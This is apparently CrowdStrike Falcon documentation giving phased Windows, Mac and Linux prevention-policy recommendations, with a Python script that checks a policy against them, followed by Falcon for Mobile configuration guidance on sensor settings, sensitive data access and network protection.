Tip: During deployment, keep in mind that host group assignment affects what policy applies to a host. For unassigned hosts and hosts groups without prevention policies, the default policy applies. If a host is assigned to multiple host groups, the policy that applies depends on policy precedence. For more info, see Policy precedence and default policies.

Phase 1: Initial deployment

If your environment has pre-existing antivirus or HIPS suites, start with this phase for rapid deployment. Assign host groups and then run phase 1 for the minimum time required to allow most of your applications to execute while you triage detections and address any false positives as appropriate, typically no more than 45 days. What this policy offers:

  • Sets the machine learning (ML) settings to detect-only so you can safely triage detections. Many of the IOA-based settings are disabled here but still generate detections, allowing you to triage detections for those settings as well.

  • Enables a few behavior-based protections for ransomware and IOAs that are low probability for false positives. This provides some immediate protection against dangerous exploits as you prepare to move to optimal protection in Phase 3.

Note: To test in-depth Falcon protection capabilities before full deployment, assign your test hosts to Phase 3.

Phase 2: Interim protection

These interim policy settings offer solid protection, so we recommend disabling or uninstalling other third-party AV products now. Assign host groups and then run phase 2 for the minimum time required to allow most of your applications to execute while you continue to triage detections and address any false positives as appropriate, typically no more than 45 days. What this policy offers:

  • Sets ML detections to Aggressive and ML preventions to Moderate.

  • Enables additional IOA-based prevention settings.

Note: To test in-depth Falcon protection capabilities before full deployment, assign your test hosts to Phase 3.

Phase 3: Optimal protection

This phase includes the recommended protection settings and is your ultimate prevention policy goal. Ideally you have used the other phases to refine exclusions, IOC management, and custom IOA rules, as well as assigning a representative set of non-production systems to this policy. What this policy offers:

  • Sets ML preventions to Aggressive.

  • Enables the remaining recommended IOA-based prevention policy settings.

  • Enables container drift prevention.

Windows prevention policy setting recommendations - three-phase view

Type | Category | Setting | Phase 1 - For rapid deployment with pre-existing AV | Phase 2 - Interim protection level | Phase 3 - Optimal protection
Sensor Capabilities | - | End User Notifications | Customer preference | Customer preference | Customer preference
Sensor Capabilities | - | Unknown Executable Analysis and Unknown Detection-Related Executable Analysis | On | On | On
Sensor Capabilities | - | Sensor Tamper Prevention | On | On | On
Sensor Capabilities | - | Suspicious File QuickScan Pro Analysis | Customer preference | Customer preference | Customer preference
Sensor Visibility | Enhanced Visibility | Additional User Mode Data Visibility | On | On | On
Sensor Visibility | Enhanced Visibility | Interpreter-Only Visibility | On | On | On
Sensor Visibility | Enhanced Visibility | System Management Engine Visibility | On | On | On
Sensor Visibility | Enhanced Visibility | Script-Based Execution Visibility | Off | On | On
Sensor Visibility | Enhanced Visibility | HTTP Visibility and Detection | On | On | On
Sensor Visibility | Enhanced Visibility | Redacted HTTP Detection Details | Customer preference | Customer preference | Customer preference
Sensor Visibility | Enhanced Visibility | Hardware-Enhanced Exploit Detection | On | On | On
Sensor Visibility | Enhanced Visibility | Enhanced Exploitation Visibility | On | On | On
Sensor Visibility | Enhanced Visibility | Extended User Mode Data Visibility | Disabled | Cautious | Moderate
Sensor Visibility | Enhanced Visibility | Enhanced DLL Load Visibility | On | On | On
Sensor Visibility | Enhanced Visibility | WSL 2 Visibility | On | On | On
Sensor Visibility | Hardware-Enhanced Visibility | Memory Scanning with GPU | On | On | On
Sensor Visibility | Hardware-Enhanced Visibility | Memory Scanning with CPU | Off | On | On
Sensor Visibility | Firmware | BIOS Firmware Deep Visibility | Off | Off | On
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & Pup - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | Microsoft Office File Macro Machine Learning | Cloud Anti-malware for Microsoft Office Files - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | Microsoft Office File Macro Machine Learning | Cloud Anti-malware for Microsoft Office Files - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | Clean Infected Microsoft Office Files | Microsoft Office File Malicious Macro Removal | Off | Customer preference | Customer preference
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & Pup - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Prevention | Disabled | Moderate* | Moderate+
Next-Gen Antivirus | Sensor Machine Learning | Enhanced machine learning for larger files | Off | On | On
Next-Gen Antivirus | On-Demand Scans Machine Learning | Cloud-based anti-malware on-demand scanning - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | On-Demand Scans Machine Learning | Cloud-based anti-malware on-demand scanning - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | On-Demand Scans Machine Learning | Sensor-based anti-malware on-demand scanning - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | On-Demand Scans Machine Learning | Sensor-based anti-malware on-demand scanning - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | On-Demand Scans Machine Learning | Cloud-based adware & PUP on-demand scanning - Detection | Moderate | Aggressive | Aggressive
Next-Gen Antivirus | On-Demand Scans Machine Learning | Cloud-based adware & PUP on-demand scanning - Prevention | Disabled | Moderate | Moderate+
Next-Gen Antivirus | On-Demand Scans | USB Insertion Triggered Scan | On | On | On
Next-Gen Antivirus | On Write | Detect on Write | On | On | On
Next-Gen Antivirus | On Write | Quarantine on Write | Off | On | On
Next-Gen Antivirus | On Write | On Write Script File Visibility | On | On | On
Next-Gen Antivirus | Quarantine | Quarantine & Security Center Registration | Off | On* | On
Next-Gen Antivirus | Quarantine | Quarantine on Removable Media | Off | On | On
Malware Protection | Execution Blocking | Custom Indicator Blocking | On | On | On
Malware Protection | Execution Blocking | Suspicious Process Prevention | Off | On | On
Malware Protection | Execution Blocking | Suspicious Registry Operation Prevention | Off | On | On
Malware Protection | Execution Blocking | Suspicious Script and Command Prevention

Off

On

On

Malware Protection

Execution Blocking

Intelligence-Sourced Threat Prevention

On

On

On

Malware Protection

Execution Blocking

Driver Load Prevention

On

On

On

Malware Protection

Execution Blocking

Vulnerable Driver Protection

On

On

On

Malware Protection Execution Blocking Boot Configuration Database Protection Off On On
Behavior-based Prevention Execution Blocking File System Containment Off On On

Behavior-based Prevention

Exploit Mitigation

ASLR Bypass Prevention

Off

Off

On

Behavior-based Prevention

Exploit Mitigation

DEP Bypass Prevention

Off

Off

Off

Behavior-based Prevention

Exploit Mitigation

Heap Spray Pre-allocation Prevention

Off

Off

On

Behavior-based Prevention

Exploit Mitigation

NULL Page Allocation Prevention

Off

On

On

Behavior-based Prevention

Exploit Mitigation

SEH Overwrite Prevention

Off

On

On

Behavior-based Prevention

Ransomware

Backup Deletion Prevention

On

On

On

Behavior-based Prevention

Ransomware

Cryptowall Prevention

On

On

On

Behavior-based Prevention

Ransomware

File Encryption Prevention

On

On

On

Behavior-based Prevention

Ransomware

Locky Prevention

On

On

On

Behavior-based Prevention

Ransomware

File System Access Prevention

On

On

On

Behavior-based Prevention

Ransomware

Volume Shadow Copy - Audit

Off

On

On

Behavior-based Prevention

Ransomware

Volume Shadow Copy - Protect

Off

Off

On

Behavior-based Prevention

Exploitation Behavior

Application Exploitation Prevention

On

On

On

Behavior-based Prevention

Exploitation Behavior

Chopper Webshell Prevention

On

On

On

Behavior-based Prevention

Exploitation Behavior

Drive-by Download Prevention

On

On

On

Behavior-based Prevention

Exploitation Behavior

Code Injection Prevention

On

On

On

Behavior-based Prevention

Exploitation Behavior

JavaScript Execution Via Rundll32 Prevention

On

On

On

Behavior-based Prevention

Lateral Movement and Credential Access

Windows Logon Bypass ("Sticky Keys") Prevention

On

On

On

Behavior-based Prevention

Lateral Movement and Credential Access

Credential Dumping Prevention

On

On

On

Behavior-based Prevention

Remediation

Advanced Remediation

On

On

On

Behavioral detections

Cloud-based detections

Cloud-based anomalous process execution

Cautious

Moderate

Moderate

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Sensor ML Prevention and Quarantine & Security Center Registration.
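The three-phase table is easiest to act on as a gap report: which settings of a given policy are weaker than the target phase, and which phase a policy already satisfies in full. The Python below is an added example, not CrowdStrike code; its input is a constructed flat mapping of setting name to value (what you would produce after normalizing a console export), it does not assume the Falcon API's response schema, and its recommendation data is a subset of the Windows table above.

```python
"""Audit a Falcon prevention policy against the three-phase recommendations.

Added example, not CrowdStrike code. The policy is a flat mapping of
setting name -> value string, constructed here for illustration; the Falcon
API's own response schema is NOT assumed.
"""
from __future__ import annotations

from typing import Mapping

# Ordinal ranks for the two kinds of value the tables use. Higher = stricter.
TOGGLE_RANK = {"Off": 0, "On": 1}
LEVEL_RANK = {
    "Disabled": 0, "Cautious": 1, "Moderate": 2,
    "Moderate+": 3, "Aggressive": 4, "Extra Aggressive": 5,
}

# Subset of the Windows three-phase table: setting -> (phase 1, phase 2, phase 3).
WINDOWS_RECOMMENDATIONS = {
    "Script-Based Execution Visibility": ("Off", "On", "On"),
    "Memory Scanning with CPU": ("Off", "On", "On"),
    "BIOS Firmware Deep Visibility": ("Off", "Off", "On"),
    "Cloud-Based Anti-Malware - Detection": ("Moderate", "Aggressive", "Aggressive"),
    "Cloud-Based Anti-Malware - Prevention": ("Disabled", "Moderate", "Moderate+"),
    "Sensor-Based Anti-Malware - Detection": ("Moderate", "Aggressive", "Aggressive"),
    "Sensor-Based Anti-Malware - Prevention": ("Disabled", "Moderate*", "Moderate+"),
    "Quarantine & Security Center Registration": ("Off", "On*", "On"),
    "Suspicious Process Prevention": ("Off", "On", "On"),
    "Volume Shadow Copy - Protect": ("Off", "Off", "On"),
    "Credential Dumping Prevention": ("On", "On", "On"),
    "DEP Bypass Prevention": ("Off", "Off", "Off"),
    "Redacted HTTP Detection Details": ("Customer preference",) * 3,
}


def rank(value: str) -> int | None:
    """Map a setting value to a comparable rank, or None if not comparable.

    A trailing '*' (the table's footnote marker) is ignored. 'Customer
    preference' has no rank because the table sets no target for it.
    """
    v = value.rstrip("*").strip()
    if v in TOGGLE_RANK:
        return TOGGLE_RANK[v]
    if v in LEVEL_RANK:
        return LEVEL_RANK[v]
    return None


def compare_setting(actual: str, recommended: str) -> str:
    """Return 'ok', 'weaker', 'stronger' or 'not-comparable'."""
    a, r = rank(actual), rank(recommended)
    if a is None or r is None:
        return "not-comparable"
    if a < r:
        return "weaker"
    if a > r:
        return "stronger"
    return "ok"


def audit_policy(policy: Mapping[str, str], phase: int,
                 recommendations=WINDOWS_RECOMMENDATIONS) -> dict:
    """Compare every recommended setting with the policy for one phase.

    Returns 'weaker' and 'stronger' lists of (setting, actual, recommended)
    and a 'missing' list of settings absent from the policy. 'stronger' is
    informational: exceeding the recommendation is not a gap.
    """
    if phase not in (1, 2, 3):
        raise ValueError("phase must be 1, 2 or 3")
    report = {"weaker": [], "stronger": [], "missing": []}
    for setting, phases in recommendations.items():
        recommended = phases[phase - 1]
        if setting not in policy:
            report["missing"].append(setting)
            continue
        status = compare_setting(policy[setting], recommended)
        if status in ("weaker", "stronger"):
            report[status].append((setting, policy[setting], recommended))
    return report


def highest_phase_met(policy: Mapping[str, str],
                      recommendations=WINDOWS_RECOMMENDATIONS) -> int:
    """Highest phase (1-3) whose recommendations are all met, or 0 if none."""
    met = 0
    for phase in (1, 2, 3):  # phases only get stricter, so stop at first gap
        report = audit_policy(policy, phase, recommendations)
        if report["weaker"] or report["missing"]:
            break
        met = phase
    return met


# Constructed sample: a host group part-way through the rollout.
SAMPLE_POLICY = {
    "Script-Based Execution Visibility": "On",
    "Memory Scanning with CPU": "On",
    "BIOS Firmware Deep Visibility": "Off",
    "Cloud-Based Anti-Malware - Detection": "Aggressive",
    "Cloud-Based Anti-Malware - Prevention": "Moderate",
    "Sensor-Based Anti-Malware - Detection": "Aggressive",
    "Sensor-Based Anti-Malware - Prevention": "Moderate",
    "Quarantine & Security Center Registration": "On",
    "Suspicious Process Prevention": "On",
    "Volume Shadow Copy - Protect": "Off",
    "Credential Dumping Prevention": "On",
    "DEP Bypass Prevention": "On",
    "Redacted HTTP Detection Details": "On",
}

if __name__ == "__main__":
    print(f"Highest phase fully met: {highest_phase_met(SAMPLE_POLICY)}")
    for setting, actual, want in audit_policy(SAMPLE_POLICY, 3)["weaker"]:
        print(f"  below phase 3: {setting}: {actual} (recommended {want})")
```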

Mac prevention policy setting recommendations - three-phase view
| Type | Category | Setting | Phase 1 (rapid deployment with pre-existing AV) | Phase 2 (interim protection level) | Phase 3 (optimal protection) |
|---|---|---|---|---|---|
| Sensor Capabilities | - | End User Notifications | Customer preference | Customer preference | Customer preference |
| Sensor Capabilities | - | Unknown Executable Analysis and Unknown Detection-Related Executable Analysis | On | On | On |
| Sensor Capabilities | - | Sensor Tamper Prevention | On | On | On |
| Sensor Capabilities | - | Suspicious File QuickScan Pro Analysis | Customer preference | Customer preference | Customer preference |
| Sensor Visibility | Enhanced Visibility | Enhanced Network Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Script-Based Execution Visibility | On | On | On |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & Pup - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & Pup - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor Adware & PUP - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor Adware & PUP - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | On Write | Detect on Write | On | On | On |
| Next-Gen Antivirus | On Write | Quarantine on Write | Off | On | On |
| Next-Gen Antivirus | Quarantine | Quarantine | Off | On* | On |
| Malware Protection | Execution Blocking | Custom Indicator Blocking | On | On | On |
| Malware Protection | Execution Blocking | Suspicious Process Prevention | Off | On | On |
| Malware Protection | Execution Blocking | Intelligence-Sourced Threat Prevention | On | On | On |
| Behavior-based Prevention | Unauthorized Remote Access IOAs | XPCOM Shell Prevention | On | On | On |
| Behavior-based Prevention | Unauthorized Remote Access IOAs | Chopper Webshell Prevention | On | On | On |
| Behavior-based Prevention | Unauthorized Remote Access IOAs | Empyre Backdoor Prevention | On | On | On |
| Behavior-based Prevention | Credential Dumping IOAs | KcPassword Decoded Prevention | On | On | On |
| Behavior-based Prevention | Credential Dumping IOAs | Hash Collector Prevention | On | On | On |

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Quarantine.

Linux prevention policy recommendations - three-phase view
| Type | Category | Setting | Phase 1 (rapid deployment with pre-existing AV) | Phase 2 (interim protection level) | Phase 3 (optimal protection) |
|---|---|---|---|---|---|
| Sensor Capabilities | - | Unknown Executable Analysis and Unknown Detection-Related Executable Analysis | On | On | On |
| Sensor Capabilities | - | Sensor Tamper Prevention | On | On | On |
| Sensor Capabilities | - | Suspicious File QuickScan Pro Analysis | Customer preference | Customer preference | Customer preference |
| Sensor Visibility | Enhanced Visibility | Script-Based Execution Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | SSH Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Filesystem Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Network Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | HTTP Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | FTP Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | TLS Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Email Protocol Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Extended Command Line Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Memory Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | D-Bus Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Enhance PHP Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | Enhance Systemd Visibility | On | On | On |
| Sensor Visibility | Enhanced Visibility | PHP Script Optimization | Customer preference | Customer preference | Customer preference |
| Sensor Visibility | Enhanced Visibility | Environment Variable Visibility | On | On | On |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | On Write | On Write Script File Visibility | On | On | On |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Detection | Moderate | Aggressive | Aggressive |
| Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Prevention | Disabled | Moderate | Moderate+ |
| Next-Gen Antivirus | Quarantine | Quarantine | Off | On | On |
| Malware Protection | Execution Blocking | Custom Indicator Blocking | On | On | On |
| Malware Protection | Execution Blocking | Suspicious Process Prevention | Off | On | On |
| Container Protection | Execution Blocking | Container Drift Prevention | Off | Off | Off |

* Co-resident antivirus products - particularly anything with any form of On-Access Scanner (OAS) - should be disabled and/or uninstalled after enabling Quarantine.

Configuring Falcon for Mobile

Manage mobile sensor settings, policies, custom IOCs, and protected Android apps. View mobile detections and events.

Overview

Falcon for Mobile lets you see events from Android, iOS, and iPadOS devices in your environment.

After deploying Falcon for Mobile and enrolling mobile devices, use the Falcon console to configure mobile policies. Mobile policies consist of sensor settings that are applied to hosts based on assigned host groups.

You can also use the Falcon console to manage mobile hosts and view detections and events.

For more info about deploying Falcon for Mobile, see:

  • Deploying Falcon for Mobile to Android Devices

  • Deploying Falcon for Mobile to iOS Devices

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

Requirements

  • Subscription: Falcon for Mobile

    Note: Falcon for Mobile includes Falcon Insight XDR
  • OS support:

    • Android 9.0 and later

    • iOS 16 and later

  • Clouds: Available for all clouds

  • Roles: Falcon Administrator or Mobile Admin

Integrating with an MDM for remediation actions

Integrate with Microsoft Intune or Omnissa Workspace ONE to gain greater flexibility and control over how Falcon for Mobile responds to potential threats.

Configure this integration after deploying Falcon for Mobile to your devices. For more info, see:

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Workspace ONE and Microsoft Intune for remediation actions, as this will result in unexpected behavior.

Using multi-factor authentication with FalconID

Falcon for Mobile integrates with Falcon Identity Protection to provide a phish-resistant multi-factor authentication solution. For more info, see FalconID.

Network protection

The network connections that Falcon for Mobile can monitor depend on your deployment and configuration method. This also applies to connections that can be blocked, such as through network containment or custom IOCs.

  • For Android hosts, you must have the Falcon for Mobile VPN or the proxy configured. With the VPN, the sensor can monitor network connections of all installed apps for the profile that Falcon for Mobile is installed in. The proxy is supported for devices with a single profile and can monitor connections for all apps. For more info about profiles, see Android profiles. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.
  • For iOS hosts, the deployed configuration profile type determines which connections are monitored.
    • For supervised devices using a Content Filter profile, the sensor can monitor all network connections.
    • For unmanaged devices, or for managed, unsupervised devices using a Per-App VPN created through the Falcon console, the sensor monitors connections made through the Safari browser and in-app Safari WebViews.
      Note: There are some restrictions with how custom IOCs are applied for this type of Per-App VPN profile. For more info, see Considerations with mobile IOCs.
    • For managed, unsupervised devices using a manually created Per-App VPN profile, the sensor monitors connections for protected apps. Due to a limitation with iOS, the Per-App VPN profile can’t be applied to Safari; however, you can monitor specified Safari domains if supported by the MDM.
      Note: To respect end-user privacy, there are limitations on the data Falcon for Mobile collects in unmanaged environments.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Android profiles

Falcon for Mobile can monitor and protect network activity within the profile that it's deployed to.

For example, if your devices are company-owned and fully managed by an MDM, there is usually only one profile on the device. All apps are installed in and run from that profile, and Falcon for Mobile can see network activity from all apps. In the case of a BYOD environment, users' devices might have a personal profile plus a work profile deployed to it. In this case, Falcon for Mobile is typically deployed to the work profile and can see only network activity from apps installed in that profile.

For more general info on Android profiles, see the documentation for Android Enterprise.

Mobile policy sensor settings

Mobile policies contain sensor settings that determine what sort of activity triggers a detection or preventative action.

Recommended mobile policy settings

Mobile policy configuration typically depends on your specific use cases and needs. The table describes a common policy configuration that balances security, visibility, and end user experience.

| Mobile policy setting | Recommendation | Details |
|---|---|---|
| Block malicious network connections | Enabled | See Network preventions. |
| Allow remote log collection | Enabled | See Application log collection. |
| Connected Wi-Fi networks | Enabled | After enabling, end users must allow precise location permissions on their devices. Some MDMs might allow automatically granting this permission for Android devices. Note: Location permissions are not required for Wi-Fi information to work on iOS Per-App VPN (unsupervised) deployments. If this setting is disabled, or the permission isn’t granted on devices, or only the coarse/approximate location permission is granted, you can’t monitor which Wi-Fi access points users connect to and when they disconnect. See Access to sensitive data types. Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when this setting is enabled. |
| Connected Bluetooth devices | Disabled | If there is no need to review the exact accessory connections made by devices, this setting can be disabled. If you enable this setting, end users must allow Bluetooth permissions. Some MDMs might allow automatically granting this permission. See Access to sensitive data types. Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when this setting is enabled. |
| Network contain during MITM attacks | Disabled | Start with this setting disabled until you’re confident that no corporate Wi-Fi access points trigger the SecureTrafficDecrypted detection. See Automatic network containment. |
| Monitor network using VPN (Android only) | Enabled | See Protecting network activity on Android devices. |
| Remote attestation (Android only) | Enabled | See Device integrity for Android devices. |
| Currently installed apps (Android only) | Enabled | This setting provides visibility into app-related threats. Only disable this setting if there are strong privacy concerns from end users on their BYOD devices. See Access to sensitive data types. |
| Allow upload of APK files (Android only) | Enabled | This setting helps discover unknown malware or risky apps. If your organization develops custom corporate apps that are sideloaded on the device (distributed outside Google Play Store), consider disabling this setting. This ensures that CrowdStrike doesn't have access to these apps. See Access to sensitive data types. |
| Filename visibility (Android only) | Disabled | See Access to sensitive data types. |

Access to sensitive data types

Falcon for Mobile has several mobile policy settings to enable visibility into sensitive data types.

| Setting | Description | Related events |
|---|---|---|
| Allow upload of APK files | Upload the APK files of installed Android apps to CrowdStrike for Falcon Intelligence analysis. For more info, see Uploading Android APKs for analysis. Note: When using this feature, we recommend enabling the Currently installed apps setting to help correlate installed apps with provided reports. | Not applicable |
| Connected Wi-Fi networks | View the Wi-Fi networks mobile hosts are connected to. | WiFiConnect, WiFiDisconnect |
| Connected Bluetooth devices | View the Bluetooth devices and Bluetooth MAC addresses that mobile hosts are connected to. For Android, this setting applies only to Bluetooth Classic devices. For iOS, this setting applies only to Bluetooth Low Energy (LE) devices. | AccessoryConnected, AccessoryDisconnected |
| Currently installed apps (Android only) | View apps currently installed on mobile hosts. | AndroidManifestFragmentData, AppSideLoaded, AppUninstalled, DebuggableFlagTurnedOn, HarmfulAppData, MobileAppIdentifiers. Note: The MobileAppIdentifiers and AppUninstalled events can be sent for suspicious apps even when this setting is disabled. For more info, see Detecting suspicious Android apps. |
| Filename visibility (Android only) | View the names of files written to external storage. Note: Due to Android application permissions, this is supported only by Android OS versions 10 and earlier. | RemovableMediaFileWritten |

When deploying Falcon for Mobile, the CrowdStrike Falcon app requires permission to access some of these sensitive data types. For more info, see:

  • Android: Granting access to potentially sensitive information

  • iOS: Granting access to potentially sensitive information

Note: Falcon for Mobile never collects precise geolocation information using the device’s location services, even when location or Bluetooth permissions are granted. However, Falcon for Mobile does generate a general location for a device based on IP address geolocation, regardless of permissions.

Important: The data that can be collected by enabling these settings might be legally protected in some countries. Be certain you are aware of all privacy laws and regulations for all of your potential CrowdStrike Falcon app users.

Uploading Android APKs for analysis

If you have a Falcon Prevent subscription and any Falcon Intelligence subscription, you can automatically submit Android APKs to Falcon Intelligence for analysis.

When the Allow upload of APK files mobile policy setting is enabled, the sensor checks the apps installed on protected devices. Apps that CrowdStrike hasn’t seen before are uploaded. If an app is deemed suspicious, Falcon Sandbox detonates the APK and performs a thorough analysis. When finished, Falcon Intelligence provides a comprehensive report to help you determine if an app could be malicious. This data also helps improve Falcon’s ability to detect and identify future threats. For more info about Falcon Intelligence and Falcon Sandbox reports, see Sandbox.

To limit the impact on device performance and network consumption, apps are uploaded only when a device is connected to Wi-Fi and is plugged in.

To simplify correlation of installed apps on Falcon for Mobile devices with Falcon Intelligence reports on analyzed APKs, we recommend enabling the Currently installed apps mobile policy setting.

If you don’t want to automatically upload apps from users’ devices, perhaps due to privacy laws and regulations in your country, you can also manually submit individual APKs for analysis. For more info, see Submit for analysis in Sandbox.

Detecting suspicious Android apps

Regardless of how the Currently installed apps and Allow upload of APK files policy settings are configured, Falcon for Mobile generates and sends these events:

  • All sensor versions: HarmfulAppData is sent for apps marked as harmful by Google’s VerifyApps.

  • Sensor version 2022.01.3110002 and later:

    • MobileAppIdentifiers is sent when a suspicious app is detected.

    • AppUninstalled is sent when a suspicious app is uninstalled.

An installed app is considered suspicious if:

  • The app is marked by Google’s VerifyApps as harmful.

  • The app isn’t marked as harmful by VerifyApps but has the same package name as an app that was previously installed on the device that was marked as harmful.

Automatic network containment

The Network contain during MITM attacks policy option automatically contains hosts during a man-in-the-middle (MITM) attack.

An automatically contained host is isolated from all network activity. The host remains contained for the duration of the MITM attack, and the sensor automatically lifts containment when the attack is no longer detected.

Unlike manual network containment, sensors on hosts that are automatically contained block all network connections. This includes connections to IP addresses allowlisted in the containment policy and connections to the CrowdStrike Cloud, which prevents usage of the compromised network connection. Because of this, you can’t manually lift containment caused by a detected MITM attack.

The sensor attempts to establish a trustworthy connection to the CrowdStrike cloud as soon as possible. If the sensor can’t immediately reconnect, it will periodically retry the connection. After a trustworthy connection is established, the sensor lifts containment, and network access is restored to the device. Any sensor events generated during the MITM attack are sent to the CrowdStrike cloud.

Note: The network connections that the sensor can block depend on your deployment and configuration method. For more info, see Network protection.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Important: If you use FalconID for multi-factor authentication, be aware that FalconID is disabled during network containment. Users can’t authenticate with FalconID until containment is lifted.

Network preventions

Falcon for Mobile can prevent malicious connections on your mobile devices by blocking IP addresses and domains that have a poor reputation.

Protect your mobile devices from malicious connections by enabling Block malicious network connections in your mobile policies. When this setting is enabled, Falcon for Mobile checks the domain or IP address in a connection to determine if it’s malicious. For URLs, Falcon for Mobile evaluates the domain portion. If the IP address or domain is known to be malicious, Falcon for Mobile blocks the connection and generates a detection.

If this setting is disabled, Falcon for Mobile won’t block malicious connections but will generate detections.

You can optionally send notifications to end users when connections are blocked. For more info, see End-user notifications.

Falcon for Mobile evaluates and blocks connections based on any of the following criteria:

  • Matching domains or IP addresses against a cloud blocklist

  • High-severity indicators marked as mobile by Counter Adversary Operations

  • Phishing links from third-party sources

Tip: You can block specific domains or IP addresses with custom IOCs. For more info, see Managing custom IOCs for mobile devices.

Prevention considerations

  • If Falcon for Mobile is unable to get a timely response from the CrowdStrike cloud, a queried connection is allowed. If an allowed connection is later discovered to be malicious, Falcon for Mobile will terminate the connection if it’s still active and generate a remediation event.

    Note: If you’re using a Content Filter profile with iOS devices, Falcon for Mobile is unable to terminate existing connections but can still generate a detection event. This limitation doesn’t exist for iOS devices using a Per-App VPN profile.
  • If you add custom indicators of compromise (IOCs) for mobile devices, the configured actions of those IOCs take precedence over network preventions. For example, you might have a domain blocked by network preventions that you want to allow access to. You can add an IOC with this domain and set the action to Detect only or Allow. For more info, see Managing custom IOCs for mobile devices.

  • To block malicious connections on Android devices, you must have the Falcon for Mobile VPN or the proxy configured. This can block connections for apps installed on the device. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.

  • For iOS devices:

    • If you’re using a Content Filter profile with iOS version 15 or later and the iCloud Private Relay service is enabled on your device, malicious connections to IP addresses can’t be blocked when using Safari. Disable Private Relay or disable the allowCloudPrivateRelay setting in your MDM’s payload configuration. You can also block DNS resolution to certain iCloud domains. For more info, see Prepare Your Network or Web Server for iCloud Private Relay.

      Note: Malicious connections can still be blocked by domain regardless of Private Relay settings.
    • If your iOS devices are supervised and you didn’t apply a Content Filter profile downloaded using the workflow in the Falcon console, additional configuration is recommended for users to see notifications for blocked connections. This can be done by creating a Notification profile for the CrowdStrike Falcon app with the Allow Notification and Show in Notification Center options enabled.

    • If you’re using a Per-App VPN profile, make sure this profile is applied to any web browser apps used in your environment.

      Note: Due to a limitation with iOS, the Per-App VPN profile can’t be applied to Safari.

Protecting network activity on Android devices

You can monitor and protect network activity on your Android devices with the Falcon for Mobile VPN or on-device HTTP proxy.

The VPN and the proxy offer the same level of protection and can be configured together or independently of each other. However, we recommend configuring the VPN if possible. With the on-device proxy, it is up to apps to honor global proxy settings, and in some cases an app might not send traffic to the Falcon for Mobile proxy. This is not an issue with the VPN.

Note: You must have an MDM to configure the proxy.

There are some limitations when using the Falcon for Mobile VPN or on-device proxy while a third-party proxy server is also configured.

  • Using the Falcon for Mobile VPN with a third-party proxy server isn't supported for Android version 9.

  • Using the Falcon for Mobile on-device proxy at the same time as a third-party proxy server isn't supported for any Android version.

This includes network-specific proxies, such as for Wi-Fi or mobile networks. This limitation doesn't apply to global proxies.

Using the Falcon for Mobile VPN

When the Monitor network using VPN mobile policy setting is enabled, you can view network events for all apps installed in the profile that Falcon for Mobile is deployed to. The VPN also blocks malicious connections if you have configured features such as network containment or custom IOCs.

For more info about profiles, see Android profiles.

Note: When you enable the VPN in a mobile policy, the VPN must also be enabled on devices protected by that policy. For more info, see Enabling the VPN on Android devices.

Multi-VPN support

